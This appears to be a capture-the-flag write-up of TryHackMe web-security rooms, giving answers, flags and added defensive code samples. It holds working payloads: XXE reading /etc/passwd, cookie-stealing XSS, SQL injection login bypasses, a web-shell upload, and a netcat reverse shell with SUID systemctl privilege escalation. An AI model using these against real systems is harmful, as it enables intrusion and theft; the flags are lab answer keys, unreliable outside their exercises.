Application-based vulnerabilities
Contents
- Application-based vulnerabilities
- Web Fundamentals
- OWASP Top 10
- task1 Introduction
- task2 Accessing machines
- task3 [Severity 1] Injection
- task4 [Severity 1] OS Command Injection
- task5 [Severity 1] Command Injection Practical
- task6 [Severity 2] Broken Authentication
- task7 [Severity 2] Broken Authentication Practical
- task8 [Severity 3] Sensitive Data Exposure (Introduction)
- task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)
- task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)
- task11 [Severity 3] Sensitive Data Exposure (Challenge)
- task12 [Severity 4] XML External Entity
- task13 [Severity 4] XML External Entity - eXtensible Markup Language
- task14 [Severity 4] XML External Entity - DTD
- task15 [Severity 4] XML External Entity - XXE Payload
- task16 [Severity 4] XML External Entity - Exploiting
- task17 [Severity 5] Broken Access Control
- task18 [Severity 5] Broken Access Control (IDOR Challenge)
- task19 [Severity 6] Security Misconfiguration
- task20 [Severity 7] Cross-site Scripting
- task21 [Severity 8] Insecure Deserialization
- task22 [Severity 8] Insecure Deserialization - Objects
- task23 [Severity 8] Insecure Deserialization - Deserialization
- task24 [Severity 8] Insecure Deserialization - Cookies
- task25 [Severity 8] Insecure Deserialization - Cookies Practical
- task26 [Severity 8] Insecure Deserialization - Code Execution
- task27 [Severity 9] Components With Known Vulnerabilities - Intro
- task28 [Severity 9] Components With Known Vulnerabilities - Exploit
- task29 [Severity 9] Components With Known Vulnerabilities - Lab
- task30 [Severity 10] Insufficient Logging and Monitoring
- task31 What Next?
- OWASP Juice Shop
- Vulnversity :star: reverse shell :star: systemctl privilege escalation
Web Fundamentals
task1 Introduction and objectives
1.Read and understand the information
task2 How do we load websites?
1.What request verb is used to retrieve page content?
get
2.What port do web servers normally listen on?
80
3.What’s responsible for making websites look fancy?
CSS
The actual content of a web page is usually a combination of HTML, CSS and JavaScript. HTML defines the page's structure and content. CSS lets you change how the page looks and make it fancy. JavaScript is a programming language that runs in the browser and lets you make the page interactive or load additional content.
task3 More HTTP - Verbs and request formats
1.What verb would be used for a login?
post
2.What verb would be used to see your bank balance once you’re logged in?
get
3.Does the body of a GET request matter? Yea/Nay
Nay
4.What’s the status code for “I’m a teapot”?
418
This comes from a joke RFC that the IETF published on April Fools' Day 1998: RFC 2324 - Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0).
In HTCPCP/1.0, status 418 means that when a client asks a teapot to brew coffee, the teapot answers with 418, "I'm a teapot".
5.What status code will you get if you need to authenticate to access some content, and you’re unauthenticated?
401
task4 Cookies, tasty!
1.Read and try and understand this information. Check out the link for extra information
task5 Mini CTF
1.What’s the GET flag?
thm{162520bec925bd7979e9ae65a725f99f}
curl http://10.10.103.59:8081/ctf/get
2.What’s the POST flag?
thm{3517c902e22def9c6e09b99a9040ba09}
curl -d flag_please http://10.10.103.59:8081/ctf/post
3.What’s the “Get a cookie” flag?
thm{91b1ac2606f36b935f465558213d7ebd}
Visit http://10.10.103.59:8081/ctf/getcookie in Firefox and inspect the browser's cookies.
4.What’s the “Set a cookie” flag?
thm{c10b5cb7546f359d19c747db2d0f47b3}
Edit the cookie for domain 10.10.103.59 so that both its name and value are flagpls, then visit http://10.10.103.59:8081/ctf/sendcookie;
alternatively, in the previous question save the cookie with curl -c cookie.txt http://10.10.103.59:8081/ctf/getcookie, change the cookie name/value to flagpls, and then send it with curl -b cookie.txt http://10.10.103.59:8081/ctf/sendcookie to get the flag.
OWASP Top 10
task1 Introduction
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XML External Entity
- Broken Access Control
- Security Misconfiguration
- Cross-site Scripting
- Insecure Deserialization
- Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
task2 Accessing machines
Connect to our network or deploy the AttackBox.
task3 [Severity 1] Injection
I’ve understood Injection attacks.
task4 [Severity 1] OS Command Injection
I’ve understood command injection.
task5 [Severity 1] Command Injection Practical
1.What strange text file is in the website root directory?
drpepper.txt
2.How many non-root/non-service/non-daemon users are there?
0
3.What user is this app running as?
www-data
4.What is the user’s shell set as?
usr/sbin/nologin
5.What version of Ubuntu is running?
18.04.4
6.Print out the MOTD. What favorite beverage is shown?
DR PEPPER
00-header: /etc/update-motd.d/00-header is where the SSH login welcome message (MOTD) is changed on Ubuntu.
task6 [Severity 2] Broken Authentication
1.I’ve understood broken authentication mechanisms.
task7 [Severity 2] Broken Authentication Practical
1.What is the flag that you found in darren’s account?
fe86079416a21a3c99937fea8874b667
At registration, "darren" and " darren" (with a leading space) are treated as different accounts, but at login they are treated as the same account, which creates a logic flaw.
2.Now try to do the same trick and see if you can login as arthur.
3.What is the flag that you found in arthur’s account?
d9acof7db4fda460ac3edeb75d75e16e
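The registration/login mismatch from task 7, as an added example that is not part of the room: a vulnerable store that compares raw names at registration but trims them at login, beside a hardened store that uses one canonical key everywhere. The dict-backed store and the normalization policy are assumptions.

```python
# Added example (not from the room): the registration/login mismatch
# described above, as a vulnerable variant beside a hardened one.
# The dict-backed store is an assumption standing in for the real app.

def normalize(username: str) -> str:
    """Canonical form: collapse whitespace and casefold (assumed policy)."""
    return " ".join(username.split()).casefold()

class VulnerableUsers:
    """Registration compares raw names, so ' darren' is accepted as new;
    login then derives the session identity from the trimmed name."""
    def __init__(self):
        self.db = {}  # raw username -> password

    def register(self, username, password):
        if username in self.db:  # exact match only: ' darren' != 'darren'
            return False
        self.db[username] = password
        return True

    def login(self, username, password):
        if self.db.get(username) != password:  # checks the attacker's row...
            return None
        return username.strip()  # ...but issues a session for 'darren'

class HardenedUsers:
    """One canonical key for every lookup: the identity that is
    authenticated is the identity the session is issued for."""
    def __init__(self):
        self.db = {}  # normalized username -> password

    def register(self, username, password):
        key = normalize(username)
        if not key or key in self.db:  # ' darren' collides with 'darren'
            return False
        self.db[key] = password
        return True

    def login(self, username, password):
        key = normalize(username)
        return key if self.db.get(key) == password else None

def demo():
    """(session the attacker obtains, whether the hardened store refused)."""
    v = VulnerableUsers()
    v.register("darren", "owner-secret")
    v.register(" darren", "attacker-pw")
    h = HardenedUsers()
    h.register("darren", "owner-secret")
    return v.login(" darren", "attacker-pw"), not h.register(" darren", "attacker-pw")
```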
task8 [Severity 3] Sensitive Data Exposure (Introduction)
Read the introduction to Sensitive Data Exposure and deploy the machine.
task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)
Read and understand the supporting material on SQLite Databases.
task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)
Read the supporting material about cracking hashes.
task11 [Severity 3] Sensitive Data Exposure (Challenge)
1.What is the name of the mentioned directory?
/assets
2.Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
webapp.db
3.Use the supporting material to access the sensitive data. What is the password hash of the admin user?
6eea9b7ef19179a06954edd0f6c05ceb
4.What is the admin’s plaintext password?
qwertyuiop
5.Login as the admin. What is the flag?
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
task12 [Severity 4] XML External Entity
Deploy the machine attached to the task.
task13 [Severity 4] XML External Entity - eXtensible Markup Language
1.Full form of XML
eXtensible Markup Language
XML (eXtensible Markup Language) is an extensible markup language.
2.Is it compulsory to have XML prolog in XML documents?
no
3.Can we validate XML documents against a schema?
yes
4.How can we specify XML version and encoding in XML document?
XML Prolog
task14 [Severity 4] XML External Entity - DTD
1.How do you define a new ELEMENT?
!ELEMENT
2.How do you define a ROOT element?
!DOCTYPE
3.How do you define a new ENTITY?
!ENTITY
!ELEMENT defines a new element; !DOCTYPE defines the root element; !ENTITY defines a new entity.
task15 [Severity 4] XML External Entity - XXE Payload
1.Try the payload mentioned in description on the website.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
task16 [Severity 4] XML External Entity - Exploiting
1.Try to display your own name using any payload.
2.See if you can read the /etc/passwd
3.What is the name of the user in /etc/passwd
falcon
4.Where is falcon’s SSH key located?
/home/falcon/.ssh/id_rsa
5.What are the first 18 characters for falcon’s private key
MIIEogIBAAKCAQEA7b
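A server-side mitigation for the XXE payload from task 15, as an added example that is not part of the room: untrusted XML is refused before parsing if it carries any DOCTYPE or ENTITY declaration. The inputs are constructed and the endpoint shape is assumed.

```python
# Added example (not part of the room): a DTD gate in front of the parser.
# The payload from task 15 works only because the parser honours its inline
# DOCTYPE/ENTITY declaration; refusing any document that carries a DTD
# removes the external-entity surface before parsing starts.
import re
import xml.etree.ElementTree as ET

# Constructed inputs for the demo: the room's payload and a harmless document.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>"""
BENIGN = '<?xml version="1.0"?><root><name>falcon</name></root>'

# Any DOCTYPE or ENTITY declaration is grounds for rejection; a legitimate
# API client has no reason to ship a DTD along with its data.
_DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

def has_dtd(document: str) -> bool:
    """True when the document declares a DTD or an entity."""
    return _DTD_RE.search(document) is not None

def parse_untrusted(document: str) -> ET.Element:
    """Parse only DTD-free XML; raise ValueError for anything else."""
    if has_dtd(document):
        raise ValueError("DTD/ENTITY declarations are not accepted")
    return ET.fromstring(document)

def handle_submission(document: str):
    """What the endpoint would return: ('rejected', None) or ('ok', <name>)."""
    try:
        root = parse_untrusted(document)
    except (ValueError, ET.ParseError):  # gated out, or simply malformed
        return ("rejected", None)
    return ("ok", root.findtext("name"))
```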
task17 [Severity 5] Broken Access Control
Read and understand how broken access control works.
task18 [Severity 5] Broken Access Control (IDOR Challenge)
1.Read and understand how IDOR works.
2.Deploy the machine and go to http://MACHINE_IP - Login with the username being noot and the password test1234.
3.Look at other users notes. What is the flag?
flag{fivefourthree}
task19 [Severity 6] Security Misconfiguration
1.Deploy the VM
2.Hack into the webapp, and find the flag!
thm{4b9513968fd564a87b28aa1f9d672e17}
(https://github.com/NinjaJc01/PensiveNotes)
task20 [Severity 7] Cross-site Scripting
1.Deploy the VM
2.Navigate to http://10.10.131.49/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
ThereIsMoreToXSSThanYouThink
3.On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.
ReflectiveXss4TheWin
<script>alert(window.location.hostname)</script>
4.Now navigate to http://10.10.131.49/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.
Then add a comment and see if you can insert some of your own HTML.
HTML_T4gs
5.On the same page, make an alert popup box appear on the page with your document cookies.
W3LL_D0N3_LVL2
<script>alert(document.cookie)</script>
6.Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.
websites_can_be_easily_defaced_with_xss
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
task21 [Severity 8] Insecure Deserialization
1.Who developed the Tomcat application?
Apache Software Foundation
2.What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
Deserialization vulnerabilities can lead to DoS (Denial of Service) and RCE (Remote Code Execution).
task22 [Severity 8] Insecure Deserialization - Objects
If a dog were sleeping, would this be:
A) A State
B) A Behaviour
A Behaviour
task23 [Severity 8] Insecure Deserialization - Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
binary
task24 [Severity 8] Insecure Deserialization - Cookies
1.If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
webapp.com/login
2.What is the acronym for the web technology that Secure cookies work over?
https
The Secure attribute means the cookie is only sent over HTTPS connections; HttpOnly prevents JavaScript from reading the cookie.
task25 [Severity 8] Insecure Deserialization - Cookies Practical
1.1st flag (cookie value)
THM{good_old_base64_huh}
2.2nd flag (admin dashboard)
THM{heres_the_admin_flag}
task26 [Severity 8] Insecure Deserialization - Code Execution
flag.txt
Run the modified Python script obtained from GitHub to produce the base64-encoded reverse-shell payload, put it in the encodepayload cookie, and send the request.
4a69a7ff9fd68
task27 [Severity 9] Components With Known Vulnerabilities - Intro
Read above.
task28 [Severity 9] Components With Known Vulnerabilities - Exploit
Read the above!
task29 [Severity 9] Components With Known Vulnerabilities - Lab
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
On the home page, click Admin Login at the bottom right to reach the login form; the universal password %' or '1'='1 gets into the admin panel. The add-book function in the panel has an arbitrary file upload vulnerability, so upload a small web shell. Go back to the site, open the newly added book, and the reverse shell connects.
1611
task30 [Severity 10] Insufficient Logging and Monitoring
1.What IP address is the attacker using?
49.99.13.16
2.What kind of attack is being carried out?
Brute Force
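A detector for the brute-force pattern from task 30, as an added example that is not part of the room: it counts failed logins per source IP over a sliding window and flags sources that cross a threshold. The key=value log format, the threshold and the window are assumptions, and the log lines are constructed around the room's attacker IP.

```python
# Added example (not part of the room): a detector for the brute-force
# pattern in task 30. The key=value log format, the threshold and the window
# are assumptions; the lines are constructed around the room's attacker IP.
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2020-07-23T12:00:01 status=200 src=10.10.1.5 path=/login user=paul
2020-07-23T12:00:05 status=401 src=49.99.13.16 path=/login user=admin
2020-07-23T12:00:06 status=401 src=49.99.13.16 path=/login user=root
2020-07-23T12:00:07 status=401 src=49.99.13.16 path=/login user=administrator
2020-07-23T12:00:08 status=401 src=49.99.13.16 path=/login user=test
2020-07-23T12:00:09 status=401 src=49.99.13.16 path=/login user=guest
2020-07-23T12:00:10 status=401 src=49.99.13.16 path=/login user=dev
2020-07-23T12:01:30 status=401 src=10.10.1.5 path=/login user=paul
2020-07-23T12:01:45 status=200 src=10.10.1.5 path=/login user=paul
"""

FAIL_THRESHOLD = 5             # this many /login failures from one source...
WINDOW = timedelta(minutes=1)  # ...inside this span raises an alert

def parse_line(line: str) -> dict:
    """Split 'timestamp key=value ...' into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec

def find_bruteforce(log_text: str) -> dict:
    """Map source IP -> total /login failures, only for sources that reach
    FAIL_THRESHOLD failures within some WINDOW-long sliding window."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["path"] == "/login" and rec["status"] == "401":
            failures[rec["src"]].append(rec["ts"])
    flagged = {}
    for src, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > WINDOW:  # drop events older than WINDOW
                start += 1
            if end - start + 1 >= FAIL_THRESHOLD:
                flagged[src] = len(times)
                break
    return flagged
```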
task31 What Next?
Read the above!
OWASP Juice Shop
task1 Open for business!
1.Deploy the VM attached to this task to get started! You can access this machine by using your browser-based machine, or if you’re connected through OpenVPN.
2.Once the machine has loaded, access it by copying and pasting its IP into your browser; if you're using the browser-based machine, paste the machine's IP into a browser on that machine.
task2 Let’s go on an adventure!
1.Question #1: What’s the Administrator’s email address?
The reviews show each user’s email address. Which, by clicking on the Apple Juice product, shows us the Admin email!
admin@juice-sh.op
2.The search parameter visible after /#/search? is the letter q
q
3.Googling "replicator" returns results indicating that it comes from the TV show Star Trek
Star Trek
task 3 Inject the juice
1.Question #1: Log into the administrator account!
32a5e0f21372bcc1000a6088b93b458e41f0e02a
Log in with a universal password; payload 1' or '1'='1'--
2.Question #2: Log into the Bender account!
fb364762a3c102b2db932069c0e6b78e738d4066
Likewise a universal-password login; payload bender@juice-sh.op'--
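Why the two payloads above work, and the fix, as an added example that is neither the room's nor Juice Shop's code: the same lookup built by string concatenation beside its parameterised form, run against an in-memory SQLite table. The table layout and the shape of the login query are assumptions.

```python
# Added example (not from the room or Juice Shop): the "universal password"
# payloads above against a string-built query, beside the parameterised form.
# Table layout and the shape of the login query are assumptions.
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample users; plaintext passwords only to keep the demo short."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin@juice-sh.op", "admin123"),
        (2, "bender@juice-sh.op", "bender-pw"),
    ])
    return con

def login_concat(con, email, password):
    """Vulnerable: attacker text is spliced into the SQL and becomes syntax.
    The -- in the payload comments out the password clause entirely."""
    sql = ("SELECT email FROM users WHERE email = '%s' AND password = '%s'"
           % (email, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_param(con, email, password):
    """Hardened: placeholders bind the input as data, never as syntax."""
    row = con.execute(
        "SELECT email FROM users WHERE email = ? AND password = ?",
        (email, password)).fetchone()
    return row[0] if row else None

def demo():
    """Who each variant logs in for the two payloads quoted above."""
    con = make_db()
    payloads = ["1' or '1'='1'--", "bender@juice-sh.op'--"]
    return ([login_concat(con, p, "wrong") for p in payloads],
            [login_param(con, p, "wrong") for p in payloads])
```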
task 4 Who broke my lock?!
1.Question #1: Bruteforce the Administrator account’s password!
c2110d06dc6f81c67cd8099ff0ba601241f1ac0e
Brute-forcing the admin@juice-sh.op account gives the password admin123.
2.Question #2: Reset Jim’s password!
094fbc9b48e525150ba97d05b942bbf114987257
The security question asks for the brother's middle name; the previous question linked Jim to Star Trek, and his brother is George Samuel Kirk.
task 5 AH! Don’t look!
1.Question #1: Access the Confidential Document!
edf9281222395a1c5fee9b89e32175f1ccf50c5b
Click the About Us link http://10.10.164.205/ftp/legal.md; entering the ftp directory shows many files.
2.Question #2: Log into MC SafeSearch’s account!
Searching for MC SafeSearch, a YouTube video reveals that his password is "Mr. Noodles" but with "vowels into zeros", i.e. vowels replaced by 0, so the password is Mr.N00dles.
3.Question #3: Download the Backup file!
Downloading package.json.bak from the ftp directory fails with an error saying only md and pdf files may be downloaded; use %00 null-byte truncation to download the file.
task6 Who’s flying this thing?
1.Question #1: Access the administration page!
946a799363226a24822008503f5d1324536629a0
Accessing the admin panel directly returns 403; you need to be logged in as the administrator to access it.
2.Question #2: View another user’s shopping basket!
41b997a36cc33fbe4f0ba018474e19ae5ce52121
Intercept the basket request in Burp: the URL is http://10.10.164.205/rest/basket/1, where 1 is the user ID; changing it to another user's ID gives horizontal privilege escalation (IDOR) to their basket.
3.Question #3: Remove all 5-star reviews!
50c97bcce0b895e446d61c83a21df371ac2266ef
Log in to the admin page and delete the 5-star reviews on the right.
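The object-level authorization check that the basket endpoint above lacks, as an added example that is not Juice Shop code: the vulnerable lookup beside a checked one, and a variant that never takes the id from the client. The in-memory table, session shape and status codes are assumptions.

```python
# Added example (not Juice Shop code): object-level authorization for the
# /rest/basket/<id> lookup described above. The in-memory table, the session
# shape and the status codes are assumptions standing in for the real app.

# Constructed data: basket id -> owner user id and contents.
BASKETS = {
    1: {"owner": 1, "items": ["Apple Juice"]},
    2: {"owner": 2, "items": ["Banana Juice"]},
}

def basket_idor(session: dict, basket_id: int):
    """Vulnerable: serves whatever id the URL carries, ignoring who asks."""
    basket = BASKETS.get(basket_id)
    return (200, basket["items"]) if basket else (404, None)

def basket_checked(session: dict, basket_id: int):
    """Hardened: the record must belong to the authenticated user.
    A foreign id gets the same 404 as a missing one, so the response
    does not confirm which ids exist."""
    basket = BASKETS.get(basket_id)
    if basket is None or basket["owner"] != session["user_id"]:
        return (404, None)
    return (200, basket["items"])

def basket_from_session(session: dict):
    """Better still: never take the id from the client; resolve the
    caller's own basket from the server-side session."""
    for basket in BASKETS.values():
        if basket["owner"] == session["user_id"]:
            return (200, basket["items"])
    return (404, None)
```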
task 7 Where did that come from?
1.Question #1: Perform a DOM XSS!
9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf
<iframe src="javascript:alert(`xss`)">
Enter the payload in the search box.
2.Question #2: Perform a persistent XSS!
149aa8ce13d7a4a8a931472308e269c94dc5f156
The True-Client-IP request header is not filtered.
3.Question #3: Perform a reflected XSS!
23cefee1527bde039295b2616eeb29e1edc660a0
The id parameter of the URL http://10.10.164.205/#/track-result?id=5267-d156f507ae884e75 is not filtered and is rendered directly on the page; replace the id parameter with the payload to trigger the popup (Firefox recommended).
task 8 Exploration!
Access the /#/score-board/ page
7efd3174f9dd5baa03a7882027f2824d2f72d86e
/score-board is the scoreboard page.
Vulnversity ⭐️ reverse shell ⭐️ systemctl privilege escalation
task1 Deploy the machine
No answer needed.
task2 Reconnaissance
1.There are many nmap “cheatsheets” online that you can use too.
No answer needed.
2.Scan the box, how many ports are open?
6
3.What version of the squid proxy is running on the machine?
3.5.12
4.How many ports will nmap scan if the flag -p-400 was used?
400
5.Using the nmap flag -n what will it not resolve?
DNS
-n disables reverse DNS resolution.
6.What is the most likely operating system this machine is running?
Ubuntu
7.What port is the web server running on?
3333
task3 Locating directories using GoBuster
1.What is the directory that has an upload form page?
/internal/
task4 Compromise the webserver
1.Try uploading a few file types to the server; what common extension seems to be blocked?
.php
2.Run this attack, what extension is allowed?
.phtml
3.What is the name of the user who manages the webserver?
bill
4.What is the user flag?
task5 Privilege Escalation
1.On the system, search for all SUID files. What file stands out?
/bin/systemctl
find / -user root -perm -4000 -exec ls -ldb {} \; lists every SUID file owned by root on the system
/bin/systemctl has the SUID bit set and can be used for privilege escalation
2.It's challenge time! We have guided you through this far; are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
a58ff8579f0a9270368d33a9966c7fd5
www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
Privilege-escalation approach: /bin/systemctl runs with root privileges (SUID bit), so create a new service unit, have systemctl load it, and it will execute an arbitrary script.